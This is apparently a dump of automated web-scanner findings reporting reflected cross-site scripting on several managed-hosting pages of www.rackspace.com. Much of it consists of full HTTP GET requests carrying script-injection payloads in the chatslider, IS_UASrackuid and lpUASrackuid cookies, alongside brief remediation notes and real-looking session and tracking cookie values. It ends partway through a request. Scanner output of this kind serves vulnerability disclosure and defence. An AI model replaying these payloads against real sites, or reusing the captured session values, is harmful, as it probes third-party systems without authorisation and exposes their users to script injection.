IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3203"%3balert(1)//4684dedc99 was submitted in the chatslider cookie. This input was echoed as d3203";alert(1)//4684dedc99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dd3203"%3balert(1)//4684dedc99; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52253"><script>alert(1)</script>87b31546f23 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D52253"><script>alert(1)</script>87b31546f23; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bf79"><script>alert(1)</script>0314c32317d was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87bf79"><script>alert(1)</script>0314c32317d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df6a2"%3balert(1)//7c034f95656 was submitted in the IS_UASrackuid cookie. This input was echoed as df6a2";alert(1)//7c034f95656 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8df6a2"%3balert(1)//7c034f95656; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1386"><script>alert(1)</script>38a36f10c89 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dc1386"><script>alert(1)</script>38a36f10c89; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f4ef"%3balert(1)//ed1913e32fa was submitted in the chatslider cookie. This input was echoed as 4f4ef";alert(1)//ed1913e32fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D4f4ef"%3balert(1)//ed1913e32fa; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b79"><script>alert(1)</script>f9b7c80a68a was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/managed_colocation/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d7b79"><script>alert(1)</script>f9b7c80a68a; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1763b"><script>alert(1)</script>40d75046632 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f81763b"><script>alert(1)</script>40d75046632; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582a9"%3balert(1)//3f27cc85235 was submitted in the IS_UASrackuid cookie. This input was echoed as 582a9";alert(1)//3f27cc85235 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8582a9"%3balert(1)//3f27cc85235; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a907d"><script>alert(1)</script>b0be67e0e68 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da907d"><script>alert(1)</script>b0be67e0e68; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb07"%3balert(1)//a8945a03e75 was submitted in the chatslider cookie. This input was echoed as fdb07";alert(1)//a8945a03e75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/private_cloud/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dfdb07"%3balert(1)//a8945a03e75; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da3b"%3balert(1)//9d4cf39c56b was submitted in the IS_UASrackuid cookie. This input was echoed as 3da3b";alert(1)//9d4cf39c56b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83da3b"%3balert(1)//9d4cf39c56b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cfd5"><script>alert(1)</script>209dafe0ea3 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83cfd5"><script>alert(1)</script>209dafe0ea3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28ba8"><script>alert(1)</script>07d40e423d7 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/richmedia/index.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
